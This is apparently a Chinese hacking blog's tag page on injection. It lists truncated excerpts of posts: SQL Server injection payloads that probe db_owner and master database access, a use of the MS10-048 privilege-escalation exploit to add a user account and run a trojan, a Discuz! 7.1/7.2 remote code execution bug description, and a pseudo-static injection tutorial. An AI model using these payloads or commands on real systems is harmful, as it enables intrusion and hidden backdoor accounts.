Injection
1 篇文章
injection
收集的一些有些历史的注入命令
//看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- (more…)
如何成为一名黑客
原著:Eric S. Raymond (esr@thyrsus.com) 翻译:SilentScreamer 为什么写这个文档 (more…)
伪静态注入技术
常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html,在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多,也很简单这里就不说了。 (more…)
MS10-048 本地提权漏洞利用
USE MS10048.EXE NET USER XX XX /ADD USE MS10048.EXE MUMA.EXE (more…)
Discuz! 7.1 & 7.2 远程代码执行漏洞
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。 漏洞介绍: Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。 (more…)